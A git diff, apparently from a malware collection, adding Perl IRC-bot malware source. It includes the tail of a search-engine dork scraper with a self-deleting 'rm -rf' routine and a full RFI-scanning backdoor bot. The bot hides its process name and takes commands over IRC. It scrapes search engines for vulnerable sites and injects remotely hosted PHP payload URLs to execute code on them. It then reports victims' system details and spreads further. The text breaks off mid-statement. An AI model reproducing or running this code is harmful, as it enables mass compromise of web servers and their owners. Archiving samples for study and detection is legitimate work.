("http://www.goodsearch.com/Search.aspx?Keywords=".key($dork)."&page=".$i."&osmax=16"); + my $re = query($ybylink); + while ($re =~ m/href=\"(.+?)\">(.+?)<\/a>/g) { + my $h = $2; + if (($h =~ /\./) && ($h !~ /<|>| /)){ + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + + +sub gigablast() { + my $dork = $_[0]; + my $name = $_[1]; + my $gtest = ("http://www.gigablast.com/index.php?n=10&k5p=215334&q=".key($dork)."&submit.x=0&submit.y=0"); + my $re = query($gtest); + if ($re =~ /No results found for/){ + return @list; + } + else { + for ($i = 0; $i <= 1000; $i += 10) { + my $glink = ("http://www.gigablast.com/index.php?q=".key($dork)."&submit_x=929&submit_y=168&k9j=686621&s=".$i."&n=10&"); + my $re = query($glink); + while ($re =~ m/href=\"http:\/\/(.+?)\">/g) { + my $h = $1; + if ($h !~ /web\.archive|gigablast/){ + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +sub ask() { + my $dork = $_[0]; + my $name = $_[1]; + my $atest = ("http://it.ask.com/web?q=".key($dork)."&qsrc=1&o=312&l=dir&dm=all"); + my $re = query($atest); + if ($re =~ /non ha prodotto alcun risultato/) { + return @list; + } + else { + for ($i = 0;$i <= 20;$i ++){ + my $alink = ("http://it.ask.com/web?q=".key($dork)."&o=0&l=dir&qsrc=0&qid=612B74535B00F6CA7678625658F9B98C&dm=all&page=".$i); + my $re = query($alink); + while($re =~ m/href=\"http:\/\/(.+?)\"/g){ + my $h = $1; + if ($h !~ /ask|wikipedia/){ + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +## Aol doesn't work, don't know why. When i try to make a http request on aol host, this is the message that i received: You don't have permission to access /aol/search +## Don't know hot to fix it :S Anyway you have here the sub, so you can try to fix this problem + +sub aol() { + my $dork = $_[0]; + my $name = $_[1]; + my $atest = ("http://search.aol.com/aol/search?invocationType=topsearchbox.search&query=".key($dork)); + my $re = query($atest); + if ($re =~ /returned no results\.<\/h3>/) { + return @list; + } + else { + for $i(1..100){ + my $alink = ("http://search.aol.com/aol/search?query=".key($dork)."&page=".$i."&nt=SG2&do=Search&invocationType=comsearch30&clickstreamid=3154480101243260576"); + my $re = query($alink);print "$re\n"; + while($re =~ m/\"deleted\" property=\"f:url\">http:\/\/(.+?)<\/p>/g) { + my $h = $1; + push(@sgrep,$h); + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +sub dmoz() { + my $dork = $_[0]; + my $name = $_[1]; + my $dtest = ("http://search.dmoz.org/cgi-bin/search?search=".key($dork)); + my $re = query($dtest); + if ($re =~ m/No <b><a href=\"http:\/\/dmoz.org\/\">Open Directory Project<\/a><\/b> results found/g){ + return @list; + } + elsif ($re =~ /of (.+?)\)<p>/){ + my $ftot = $1; + if ($ftot <= 20) { + $max = 1; + } + else { + my $to = $ftot / 20; + if ($to =~ /(.+).(.+?)/){ + $uik = $1 * 20; + $max = $uik +1; + } + elsif ($to =~ /[0-9]/) { + my $to--; + my $rej = $to * 20; + $max = $rej +1; + } + } + } + for ($i = 1;$i <= $max;$i += 20){ + my $dlink = ("http://search.dmoz.org/cgi-bin/search?search=".key($dork)."&utf8=1&locale=it_it&start=".$i); + my $re = query($dlink); + while($re =~ m/<a href=\"http:\/\/(.+?)\"/g) { + my $h = $1; + if ($h !~ /dmoz/){ + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; +} + +sub webde() { + my $dork = $_[0]; + my $name = $_[1]; + for $i(1..50){ + my $wlink = ("http://suche.web.de/search/web/?pageIndex=".$i."&su=".key($dork)."&y=0&x=0&mc=suche@web@navigation@zahlen.suche@web"); + my $re = query($wlink); + while($re =~ m/href=\"http:\/\/(.+?)\">/g) { + my $h = $1; + if ($h !~ /\/search\/web|web.de|\" class=\"neww\"/){ + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; +} + +sub einet() { + my $dork = $_[0]; + my $name = $_[1]; + my $etest = ("http://www.einet.net/view/search.gst?p=1&k=".key($dork)."&s=0&submit=Search"); + my $re = query($etest); + if ($re =~ /<span class=nPage>Page 1 of\s+(.+?)<\/span>/){ + my $tot = $1; + for ($i = 1;$i <= $tot;$i++){ + my $elink = ("http://www.einet.net/view/search.gst?p=".$i."&k=".key($dork)."&s=0&submit=Search"); + my $re = query($elink); + while($re =~ m/<span class=url2>\s+(.+?)<\/span>/g) { + my $h = $1; + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; +} + +sub uol() { + my $dork = $_[0]; + my $name = $_[1]; + my $utest = ("http://busca.uol.com.br/www/index.html?q=".key($dork)."&ad=on"); + my $re = query($test1); + if ($re =~ /n??o retornou nenhum resultado/) { + return @list; + } + else { + for($i = 0;$i <= 360;$i +=10) { + my $uollink = ("http://busca.uol.com.br/www/index.html?ad=on&q=".key($dork)."&start=".$i); + my $re = query($uollink); + while($re =~ m/<dt><a href=\"http:\/\/(.+?)\">/g) { + my $h = $1; + push(@sgrep,$h); + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +sub abacho() { + my $dork = $_[0]; + my $name = $_[1]; + my $atest = ("http://search.abacho.com/it/abacho.it/index.cfm?q=".key($dork)."&country=it&x=0&y=0"); + my $re = query($atest); + if ($re =~ /We didn't find any results matching your query/) { + return @list; + } + else { + for ($i = 0;$i <= 1000; $i += 10) { + my $alink = ("http://search.abacho.com/it/abacho.it/index.cfm?offset=".$i."&poffset=0&StartCounter=".$i."&q=".key($dork)."&a=&b=&country=it&page=&d_html=&d_pdf=&d_msdoc=&d_xls=&d_ppt=&mesearchkey=&cluster=&coop="); + my $re = query($alink); + while ($re =~ m/target=\"_blank\">http:\/\/(.+?)<\/a>/g) { + my $h = $1; + push(@sgrep,$h); + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +sub trovatore() { + my $dork = $_[0]; + my $name = $_[1]; + my $ttest = ("http://213.215.201.230/search.jsp?query=".key($dork)."&langselect=all&hitsPerPage=10&hitsPerSite=1&clustering=&filterResults=null&start=0"); + my $re = query($ttest); + if ($re =~ /Risultati <b>0-0<\/b>/) { + return @list; + } + else { + for ($i = 0;$i <= 2500; $i += 10) { + my $tlink = ("http://213.215.201.230/search.jsp?query=".key($dork)."&langselect=all&hitsPerPage=10&hitsPerSite=1&clustering=&filterResults=null&start=".$i); + my $re = query($tlink); + while($re =~ m/<a href=\"http:\/\/(.+?)\">/g) { + my $h = $1; + if ($h !~ /iltrovatore\.it|213\.215\.201\.230|microsoft|wikipedia/){ + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +sub lycos() { + my $dork = $_[0]; + my $name = $_[1]; + my $ltest = ("http://cerca.lycos.it/cgi-bin/pursuit?pag=0&query=".key($dork)."&cat=web&enc=utf-8&xargs="); + my $re = query($ltest); + if ($re =~ /non ha avuto esito positivo tra/) { + return @list; + } + else { + for $i(0..79) { + my $llink = ("http://cerca.lycos.it/cgi-bin/pursuit?pag=".$i."&query=".key($dork)."&cat=web&enc=utf-8"); + my $re = query($llink); + while($re =~ m/title=\"\" >http:\/\/(.+?)<\/a>/g) { + my $h = $1; + if ($h !~ /youtube|google|wikipedia|microsoft/){ + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +sub walhello() { + my $dork = $_[0]; + my $name = $_[1]; + my $wtest = ("http://www.walhello.info/search?key=".key($dork)."&taal=a&nummer=0&&web=no&&vert=2&"); + my $re = query($wtest); + if ($re =~ /Verzeihung, Nichts gefunden/) { + return @list; + } + else { + for $i(0..99) { + my $wlink = ("http://www.walhello.info/search?key=".key($dork)."&taal=a&nummer=".$i."&&web=no&&vert=2&"); + my $re = query($wlink); + while($re =~ m/<a href=http:\/\/(.+?)>/g) { + my $h = $1; + if ($h !~ /walhello|microsoft|wikipedia/){ + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +sub virgilio() { + my $dork = $_[0]; + my $name = $_[1]; + my $vtest = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&Cerca=&lr="); + my $re = query($vtest); + if ($re =~ /<span>Controlla che tutte le parole siano state digitate correttamente<\/span>/) { + return @list; + } + else { + for ($i = 0;$i <= 800; $i += 10) { + my $vlink = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&filter=1&site=&lr=&hits=10&offset=".$i); + my $re = query($vlink); + while($re =~ m/<span><a href=\"http:\/\/(.+?)\">/g) { + my $h = $1; + if ($h !~ /microsoft|wikipedia/){ + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +sub admin() { + my $nick = $_[0]; + my $cheek; + @admins; + foreach my $a(@admins) { + if ($nick eq $a) { + $cheek = 1; + } + } + return $cheek; +} + +sub remove() { + my $file = @_; + foreach my $f(@_){ + system("rm -rf $f"); + } +} + +sub clean() { + $dork = $_[0]; + if ( $dork =~ /inurl:|allinurl:|intext:|allintext:|intitle:|allintitle:/ ) { + writ1("15,1[+] 4,1Cleaning Dork from Google Search Keys !"); + $dork =~ s/^inurl://g; + $dork =~ s/^allinurl://g; + $dork =~ s/^intext://g; + $dork =~ s/^allintext://g; + $dork =~ s/^intitle://g; + $dork =~ s/^allintitle://g; + } + return $dork; +} + +sub key() { + my $dork = $_[0]; + $dork =~ s/ /\+/g; + $dork =~ s/:/\%3A/g; + $dork =~ s/\//\%2F/g; + $dork =~ s/&/\%26/g; + $dork =~ s/\"/\%22/g; + $dork =~ s/,/\%2C/g; + $dork =~ s/\\/\%5C/g; + return $dork; +} + +sub fprint() { + my($name,@sgrep) = @_; + my @list; + foreach my $n(@sgrep) { + + + my @grep = &links($n); + push(@list,@grep); + } + open($file, ">>", $name); + foreach my $h(@list) { + print $file "$h\n"; + } + close($file); + return @list; +} + +sub links() { + my @l; + my $link = $_[0]; + my $host = $_[0]; + my $hdir = $_[0]; + $hdir =~ s/(.*)\/[^\/]*$/\1/; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $host .= "/"; + $link .= "/"; + $hdir .= "/"; + $host =~ s/\/\//\//g; + $hdir =~ s/\/\//\//g; + $link =~ s/\/\//\//g; + push(@l, $link, $host, $hdir); + return @l; +} + +sub unici { + my @unici = (); + my %visti = (); + foreach my $elemento (@_) { + $elemento =~ s/\/+/\//g; + next if $visti{$elemento}++; + push @unici, $elemento; + } + return @unici; +} + +sub os() { + my $site = $_[0]; + my $re = &query($site); + while ($re =~ m/<br>uname -a:(.+?)\<br>/g) { + $un = $1; + } + while ($re =~ m/<br>os:(.+?)\<br>/g) { + $os = $1; + } + while ($re =~ m/<br>id:(.+?)\<br>/g) { + $id1 = $1; + } + while ($re =~ m/<br>free:(.+?)\<br>/g) { + $free = $1; + } + while ($re =~ m/<br>used:(.+?)\<br>/g) { + $used = $1; + } + while ($re =~ m/<br>total:(.+?)\<br>/g) { + $all = $1; + } +} + +sub rce_os() { + my $site = $_[0]; + my $re = &query($site); + while ($re =~ m/^(.*)$/g) { + $un_rce = $1; + } +} + +sub cheek() { + if (($auth !~ /Osirys/)||($authmail !~ /osirys/)) { + print "\nI hate rippers, before putting your nick on a script, be sure that you coded it!\nby Osirys // Third Eye Security\n\n"; + exec("rm -rf $0 && pkill perl"); + } +} + +sub query() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub query1() { + my $url = $_[0]; + my $host = $url; + my $query = $url; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $query =~ s/$host//; + eval { + my $sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || return; + print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$sock>; + $page = "@r"; + close($sock); + }; + return $page; +} + +sub writ1() { + my $cont = $_[0]; + print $c0n "PRIVMSG $chan1 :$cont\n"; +} + +sub writ2() { + my $cont = $_[0]; + print $c0n "PRIVMSG $chan2 :$cont\n"; +} + +sub pm() { + my $nick = $_[0]; + my $cont = $_[1]; + print $c0n "PRIVMSG $nick :$cont\n"; +} + +## PRIVATE +## Coded by Osirys + + diff --git a/Perl/Backdoor.Perl.IRCBot.n b/Perl/Backdoor.Perl.IRCBot.n new file mode 100644 index 00000000..73f10218 --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.n @@ -0,0 +1,1860 @@ + +$process = "/usr/sbin/ateam"; +my $printcmd = "http://freewebtown.com/eridjon/cmdd.txt??"; +my $id = "http://unisel.t35.com/abe.txt?"; +my $spread = "http://unisel.t35.com/t.txt"; +my $ircserver = "irc.malaysiairc.org"; +my $start = "!scan"; +my $port = "6667"; +my $nickname = "TettHost" . int( rand(999) ) . "]"; +my $admin = "My","Aliff"; +my $channel = "#test"; ## the normal chan to scan, and see the results too :P +my $chanres = "#test"; ## the channel where u can find all the results of the bot +my $verz = "Priv8 RFI Scanner v1.0 beta"; + +print "\n"; +print " Priv 8 Scanner\n"; +print " Author: SeaNet\n"; +print " Release $verz\n"; +print " Server $ircserver:$port\n"; +print " $channel and $chanres\n"; +print " Enjoy ;)\n\n"; + +use IO::Socket::INET; +use HTTP::Request; +use LWP::UserAgent; +require LWP; +$|++; + +my $pid = fork; +exit if $pid; +$0 = "$process" . "\0" x 16; +my $dsp = IO::Socket::INET->new( + PeerAddr => "$ircserver", + PeerPort => "$port", + Proto => "tcp" +) or die "Can not connect on server!\n"; +$dsp->autoflush(1); +print $dsp "NICK $nickname\r\n"; +print $dsp "USER infira 8 * : infira \r\n"; +print $dsp "JOIN $channel\r\n"; +print $dsp "PRIVMSG $channel :9,1Priv8 Scaner Pornit!! \r\n"; +print $dsp "PRIVMSG $channel :8,1Comanda Scan:9,1 !scan bug dork 0,1& 4,1!google bug dork \r\n"; +print $dsp "PRIVMSG $channel :9,1Priv8 RFIScanner powered By SeaNetо \r\n"; +sleep(1); +print $dsp "NICK $nickname\r\n"; +print $dsp "USER SeaNet * : SeaNet \r\n"; +print $dsp "JOIN $chanres\r\n"; +print $dsp "PRIVMSG $chanres :9,1Aici vin rezultatele :) \r\n"; +print $dsp "PRIVMSG $chanres :9,1Priv8 RFIScanner powered By SeaNetо \r\n"; + +while ( $line = <$dsp> ) { + + $line =~ s/\r\n$//; + if ( $line =~ /^PING \:(.*)/ ) { + print "PONG :$1"; + print $dsp "PONG :$1"; + } + + if ( $line =~ /PRIVMSG $channel :!help/ ) { + sleep(1); + display( $dsp, +"PRIVMSG $channel :9,1Working ..." + ); + display( $dsp, +"PRIVMSG $channel :8,1[Ajutor]9,1 Pentru a scana foloseste comanda :4,1 !scan bug dork & !google bug dork" + ); + display( $dsp, + "PRIVMSG $channel :8,1[Ajutor]9,1 Pentru informatii server tasteaza: 4,1!info" + ); + } + + if ( $line =~ /PRIVMSG $channel :!info/ ) { + my $sysos = `uname -sr`; + my $uptime = `uptime`; + if ( $sysos =~ /freebsd/i ) { + $sysname = `hostname`; + $memory = +`expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`; + $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`; + chomp($memory); + chomp($swap); + } + + elsif ( $sysos =~ /linux/i ) { + $sysname = `hostname -f`; + $memory = `free -m |grep -i mem | awk '{print \$2}'`; + $swap = `free -m |grep -i swap | awk '{print \$2}'`; + chomp($swap); + chomp($memory); + } + else { + $sysname = "No Found"; + $memory = "No found"; + $swap = "No Found"; + } + $uptime =~ s/\n//g; + $sysname =~ s/\n//g; + $sysos =~ s/\n//g; + sleep(1); + display( $dsp, +"PRIVMSG $channel :9,1Working ..." + ); + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1 Server: $ircserver Port: $port" + ); + display( $dsp, +"PRIVMSG $channel :8,1[Info] 9,1Software: $sysos" + ); + display( $dsp, +"PRIVMSG $channel :8,1[Info] 9,1Process/Pid:8,1 $process" + ); + display( $dsp, + "PRIVMSG $channel :8,1[Info]9,1 Uptime: $uptime" ); + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1 Memorie: $memory Swap: $swap" + ); + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1 Creator: SeaNet" + ); + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1 Versiune: $verz" + ); + } + + if ( $line =~ /PRIVMSG $channel :!id/ ) + { ## йй Script made by kangkung . Don't remove this comment ! + my $testid = $id; + my $req = HTTP::Request->new( GET => $testid ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /<\?php/ ) { + sleep(1); + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1 Id`ul este online" + ); + } + } + else { + sleep(1); + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1 Id`ul nu este activ." + ); + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1 Modifica setarile cu noul id." + ); + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1 Ruleaza din nou scannerul." + ); + display( $dsp, +"PRIVMSG $channel :8,1[WARNING]9,1 Deconectare initiata." + ); + sleep(2); + display( $dsp, "PRIVMSG $channel :8,1[WARNING]9,1 Bye Bye" ); + display( $dsp, "QUIT" ); + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + sleep(1); + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1Scanare pornita pentru: 4,1$dork" + ); + my @google = &googlet($dork); + push( my @tot, @google ); + my @puliti = &unici(@tot); + display( $dsp, + "PRIVMSG $channel :9,1GOOGLE " + . scalar(@tot) + . " 9,1/9,1 " + . scalar(@puliti) + . " 9,1 pentru:4,1 $dork" ); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1 Google a terminat pentru:4,1 $dork" + ); + } + my $test = "http://" . $site . $bug . $id . "?"; + my $print = "http://" . $site . $bug . $printcmd . "?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /kangkung/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: $un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: Free: $free , Used: $used , Total: $all" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1ID: $id1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: $pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Ip Addr: $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + my $test2 = + "http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /kangkung/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + } + } + } + } + } + exit; + } + } + +if ( $line =~ /PRIVMSG $channel :!google\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + + my @google = &googlet($dork); + push( my @tot, @google ); + my @puliti = &unici(@tot); + display( $dsp, + "PRIVMSG $channel :8,1[Info]9,1Google ByPASS " + . scalar(@tot) + . " 9,1/9,1 " + . scalar(@puliti) + . "  9,1pentru4,1 $dork" ); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp, +"PRIVMSG $channel :8,1[Info]9,1Google ByPASS a terminanat pentru4,1 $dork" + ); + } + my $test = "http://" . $site . $bug . $id . "?"; + my $print = "http://" . $site . $bug . $printcmd . "?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /kangkung/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1ID: $id1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1Off 9,1Os: $os Link: $print" + ); + my $test2 = + "http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /kangkung/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :12(4hdd12) 12 Free: ($free) Used: ($used) Total: ($all) " + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :12(4php12) 12 $php1" + ); + display( $dsp, +"PRIVMSG $channel :12(4software12) 12 $sof1 " + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :12(4server-name12) 12 $name1 " + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @alltheweb = &alltheweb($dork); + push( my @tot, @alltheweb ); + my @puliti = &unici(@tot); + display( $dsp, + "PRIVMSG $channel :9,1ALLTHEWEB " + . scalar(@tot) + . " 9,1/9,1 " + . scalar(@puliti) + . " 9,1pentru4,1 $dork" ); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp, +"PRIVMSG $channel :9,1AllTheWeb a terminat pentru4,1 $dork" + ); + } + my $test = "http://" . $site . $bug . $id . "?"; + my $print = "http://" . $site . $bug . $printcmd . "?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /kangkung/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1ID: $id1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + my $test2 = + "http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /kangkung/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @uol = &uolsub($dork); + push( my @tot, @uol ); + my @puliti = &unici(@tot); + display( $dsp, + "PRIVMSG $channel :9,1UOL " + . scalar(@tot) + . " 9,1/9,1 " + . scalar(@puliti) + . "  11pentru9,1 